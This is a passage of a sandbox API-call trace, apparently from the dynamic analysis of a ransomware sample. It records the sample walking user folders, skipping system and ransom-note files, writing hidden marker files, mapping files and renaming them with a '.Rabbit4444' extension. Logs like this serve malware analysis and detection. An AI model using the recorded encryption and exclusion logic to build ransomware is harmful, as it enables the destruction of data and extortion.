"c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\settings\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0070.416] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0070.418] FlushFileBuffers (hFile=0x27c) returned 1 [0070.419] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0070.419] CloseHandle (hObject=0x27c) returned 1 [0070.420] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings") returned 102 [0070.420] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0070.420] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x765df54b, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x712cc700, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xf34a3450, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0070.420] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.420] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.420] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0070.420] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0070.420] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x765df54b, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x712cc700, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xf34a3450, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.420] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.420] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.420] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0070.420] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0070.420] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0070.420] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf34a3450, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf34a3450, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf34c9235, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0070.420] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.420] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0070.420] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x765df54b, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x765df54b, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x765df54b, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0070.420] lstrcmpiW (lpString1="roaming.lock", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0070.420] lstrcmpiW (lpString1="roaming.lock", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.420] lstrcmpiW (lpString1="roaming.lock", lpString2="Rabbit4444.exe") returned 1 [0070.420] lstrcmpiW (lpString1="roaming.lock", lpString2=".") returned 1 [0070.420] lstrcmpiW (lpString1="roaming.lock", lpString2="..") returned 1 [0070.420] lstrcmpiW (lpString1="roaming.lock", lpString2="windows") returned -1 [0070.420] lstrcmpiW (lpString1="roaming.lock", lpString2="bootmgr") returned 1 [0070.420] lstrcmpiW (lpString1="roaming.lock", lpString2="pagefile.sys") returned 1 [0070.420] lstrcmpiW (lpString1="roaming.lock", lpString2="boot") returned 1 [0070.420] lstrcmpiW (lpString1="roaming.lock", lpString2="ids.txt") returned 1 [0070.420] lstrcmpiW (lpString1="roaming.lock", lpString2="NTUSER.DAT") returned 1 [0070.420] lstrcpyW (in: lpString1=0x130ec06, lpString2="roaming.lock" | out: lpString1="roaming.lock") returned="roaming.lock" [0070.420] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings\\roaming.lock", dwFileAttributes=0x0) returned 1 [0070.421] lstrlenW (lpString="roaming.lock") returned 12 [0070.421] lstrlenW (lpString="Rabbit4444") returned 10 [0070.421] lstrcmpiW (lpString1="aming.lock", lpString2="Rabbit4444") returned -1 [0070.421] lstrlenW (lpString=".dll") returned 4 [0070.421] lstrcmpiW (lpString1="lock", lpString2=".dll") returned 1 [0070.421] lstrlenW (lpString=".lnk") returned 4 [0070.421] lstrcmpiW (lpString1="lock", lpString2=".lnk") returned 1 [0070.421] lstrlenW (lpString=".ini") returned 4 [0070.421] lstrcmpiW (lpString1="lock", lpString2=".ini") returned 1 [0070.421] lstrlenW (lpString=".sys") returned 4 [0070.421] lstrcmpiW (lpString1="lock", lpString2=".sys") returned 1 [0070.421] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x765df54b, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xbfbb19f3, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0xbfbb19f3, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0070.421] lstrcmpiW (lpString1="settings.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0070.421] lstrcmpiW (lpString1="settings.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.421] lstrcmpiW (lpString1="settings.dat", lpString2="Rabbit4444.exe") returned 1 [0070.422] lstrcmpiW (lpString1="settings.dat", lpString2=".") returned 1 [0070.422] lstrcmpiW (lpString1="settings.dat", lpString2="..") returned 1 [0070.422] lstrcmpiW (lpString1="settings.dat", lpString2="windows") returned -1 [0070.422] lstrcmpiW (lpString1="settings.dat", lpString2="bootmgr") returned 1 [0070.422] lstrcmpiW (lpString1="settings.dat", lpString2="pagefile.sys") returned 1 [0070.422] lstrcmpiW (lpString1="settings.dat", lpString2="boot") returned 1 [0070.422] lstrcmpiW (lpString1="settings.dat", lpString2="ids.txt") returned 1 [0070.422] lstrcmpiW (lpString1="settings.dat", lpString2="NTUSER.DAT") returned 1 [0070.422] lstrcpyW (in: lpString1=0x130ec06, lpString2="settings.dat" | out: lpString1="settings.dat") returned="settings.dat" [0070.422] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings\\settings.dat", dwFileAttributes=0x0) returned 1 [0070.422] lstrlenW (lpString="settings.dat") returned 12 [0070.422] lstrlenW (lpString="Rabbit4444") returned 10 [0070.422] lstrcmpiW (lpString1="ttings.dat", lpString2="Rabbit4444") returned 1 [0070.422] lstrlenW (lpString=".dll") returned 4 [0070.422] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0070.422] lstrlenW (lpString=".lnk") returned 4 [0070.422] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0070.422] lstrlenW (lpString=".ini") returned 4 [0070.422] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0070.422] lstrlenW (lpString=".sys") returned 4 [0070.422] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0070.422] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\settings\\settings.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0070.423] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0070.423] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16173342409) returned 1 [0070.423] GetFileSizeEx (in: hFile=0x29c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=262144) returned 1 [0070.423] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0070.423] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0070.423] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x40300, lpName=0x0) returned 0x2d0 [0070.424] MapViewOfFile (hFileMappingObject=0x2d0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x40300) returned 0x70000 [0070.433] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11b380 [0070.433] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0070.433] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11b380 | out: hHeap=0xe0000) returned 1 [0070.433] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0070.433] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0070.433] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0070.433] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0070.433] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0070.433] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16174389940) returned 1 [0070.433] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0070.433] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0070.433] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.436] CloseHandle (hObject=0x2d0) returned 1 [0070.436] CloseHandle (hObject=0x29c) returned 1 [0070.436] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings\\settings.dat.Rabbit4444") returned 126 [0070.436] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\settings\\settings.dat"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings\\settings.dat.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\settings\\settings.dat.rabbit4444"), dwFlags=0x1) returned 1 [0070.436] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x84031c7e, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x84031c7e, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x84031c7e, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0070.436] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0070.436] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.437] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="Rabbit4444.exe") returned 1 [0070.437] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".") returned 1 [0070.437] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="..") returned 1 [0070.437] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="windows") returned -1 [0070.437] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="bootmgr") returned 1 [0070.437] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="pagefile.sys") returned 1 [0070.437] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="boot") returned 1 [0070.437] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="ids.txt") returned 1 [0070.437] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="NTUSER.DAT") returned 1 [0070.437] lstrcpyW (in: lpString1=0x130ec06, lpString2="settings.dat.LOG1" | out: lpString1="settings.dat.LOG1") returned="settings.dat.LOG1" [0070.437] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings\\settings.dat.LOG1", dwFileAttributes=0x22) returned 1 [0070.437] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings\\settings.dat.LOG1", dwFileAttributes=0x6) returned 1 [0070.438] lstrlenW (lpString="settings.dat.LOG1") returned 17 [0070.438] lstrlenW (lpString="Rabbit4444") returned 10 [0070.438] lstrcmpiW (lpString1="s.dat.LOG1", lpString2="Rabbit4444") returned 1 [0070.438] lstrlenW (lpString=".dll") returned 4 [0070.438] lstrcmpiW (lpString1="LOG1", lpString2=".dll") returned 1 [0070.438] lstrlenW (lpString=".lnk") returned 4 [0070.438] lstrcmpiW (lpString1="LOG1", lpString2=".lnk") returned 1 [0070.438] lstrlenW (lpString=".ini") returned 4 [0070.438] lstrcmpiW (lpString1="LOG1", lpString2=".ini") returned 1 [0070.438] lstrlenW (lpString=".sys") returned 4 [0070.438] lstrcmpiW (lpString1="LOG1", lpString2=".sys") returned 1 [0070.438] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x84031c7e, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x84031c7e, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x84031c7e, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0070.438] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0070.438] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.438] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="Rabbit4444.exe") returned 1 [0070.438] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".") returned 1 [0070.438] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="..") returned 1 [0070.438] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="windows") returned -1 [0070.438] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="bootmgr") returned 1 [0070.438] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="pagefile.sys") returned 1 [0070.438] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="boot") returned 1 [0070.438] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="ids.txt") returned 1 [0070.438] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="NTUSER.DAT") returned 1 [0070.438] lstrcpyW (in: lpString1=0x130ec06, lpString2="settings.dat.LOG2" | out: lpString1="settings.dat.LOG2") returned="settings.dat.LOG2" [0070.438] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings\\settings.dat.LOG2", dwFileAttributes=0x22) returned 1 [0070.439] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings\\settings.dat.LOG2", dwFileAttributes=0x6) returned 1 [0070.439] lstrlenW (lpString="settings.dat.LOG2") returned 17 [0070.439] lstrlenW (lpString="Rabbit4444") returned 10 [0070.439] lstrcmpiW (lpString1="s.dat.LOG2", lpString2="Rabbit4444") returned 1 [0070.439] lstrlenW (lpString=".dll") returned 4 [0070.439] lstrcmpiW (lpString1="LOG2", lpString2=".dll") returned 1 [0070.439] lstrlenW (lpString=".lnk") returned 4 [0070.439] lstrcmpiW (lpString1="LOG2", lpString2=".lnk") returned 1 [0070.439] lstrlenW (lpString=".ini") returned 4 [0070.439] lstrcmpiW (lpString1="LOG2", lpString2=".ini") returned 1 [0070.439] lstrlenW (lpString=".sys") returned 4 [0070.439] lstrcmpiW (lpString1="LOG2", lpString2=".sys") returned 1 [0070.439] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x84031c7e, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x84031c7e, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x84031c7e, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0070.439] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0070.439] lstrcpyW (in: lpString1=0x130ec06, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0070.439] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\settings\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0070.440] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0070.440] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0070.441] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.441] CloseHandle (hObject=0x29c) returned 1 [0070.441] CloseHandle (hObject=0x27c) returned 1 [0070.441] GetCurrentThreadId () returned 0xd98 [0070.441] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1221e8 [0070.441] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\RoamingState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\RoamingState" [0070.441] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11b6c8 | out: hHeap=0xe0000) returned 1 [0070.441] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1221e0 | out: hHeap=0xe0000) returned 1 [0070.441] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\RoamingState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\RoamingState" [0070.441] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\RoamingState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\RoamingState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\RoamingState\\" [0070.441] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\RoamingState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3" [0070.441] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\roamingstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0070.443] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0070.445] FlushFileBuffers (hFile=0x27c) returned 1 [0070.446] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0070.446] CloseHandle (hObject=0x27c) returned 1 [0070.447] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\RoamingState") returned 106 [0070.447] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0070.447] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\RoamingState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x765b92ef, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd013c79b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf34ef4ab, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0070.447] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.448] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.448] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0070.448] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0070.448] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x765b92ef, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd013c79b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf34ef4ab, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.448] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.448] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.448] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0070.448] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0070.448] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0070.448] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf34ef4ab, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf34ef4ab, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf34ef4ab, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0070.448] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.448] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0070.448] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf34ef4ab, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf34ef4ab, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf34ef4ab, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, 